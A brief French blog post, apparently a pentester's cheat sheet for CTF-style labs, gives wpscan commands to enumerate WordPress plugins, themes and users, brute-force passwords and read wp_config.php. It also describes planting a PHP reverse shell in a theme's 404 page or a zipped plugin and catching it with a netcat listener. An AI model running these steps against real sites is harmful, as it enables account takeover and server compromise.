WordPress

Remarque : Libre à vous de trouver des failles avec d’autres outils comme sqlmap et nmap

1. WPscan

wpscan —-url http://site_ou_ip/wordpress —wp-content-dir -ep -et -eu 

wpscan –url http://192.168.1.100/ –enumerate vp,vt,u #Scan de vulnérabilités

Cat /var/www/wordpress/wp_config.php #Recupere les passwords dans la database

wpscan -u 10.0.2.4 –wordlist <wordlist>–username <username> elliot #BRUTEFORCE des utilisateurs et passwords

wpscan –url https://brainfuck.htb/ –disable-tls-checks –enumerate p –enumerate t –enumerate u #enlever le certficat SSL/TLS pour scanner

Process que j’aime utiliser :

Après être entré dans la partie admin de Worpress grâce aux commandes ci dessus, je vais dans “Apparences”. Dans un page que je peux faire apparaître tel que “404 Not Found”, j’upload un reverse shell en php de mes bon amis les PentestMonkey (PHPreverse_shell). Sinon de base sur Kali il y a des php reverse shell dans /usr/share/webshells/php.Je setup un listener netcat (nc -lnvp <port>) et j’accède à la page sur laquelle j’ai upload mon shell. 

Remarque :  Ne copiez pas bêtements le shell et pensez à modifier les paramètres qu’il faut .

Astuce :  Vous pouvez aussi uploader un plugin, il suffit de zipper votre shell dans un zip et de l’upload  dans la partie “Application”

Vous vous retrouvez avec un shell sur le serveur (TADAM) ! 

2 commentaires

Laisser un commentaire

Entrez vos coordonnées ci-dessous ou cliquez sur une icône pour vous connecter:

Logo WordPress.com

Vous commentez à l’aide de votre compte WordPress.com. Déconnexion /  Changer )

Photo Google

Vous commentez à l’aide de votre compte Google. Déconnexion /  Changer )

Image Twitter

Vous commentez à l’aide de votre compte Twitter. Déconnexion /  Changer )

Photo Facebook

Vous commentez à l’aide de votre compte Facebook. Déconnexion /  Changer )

Connexion à %s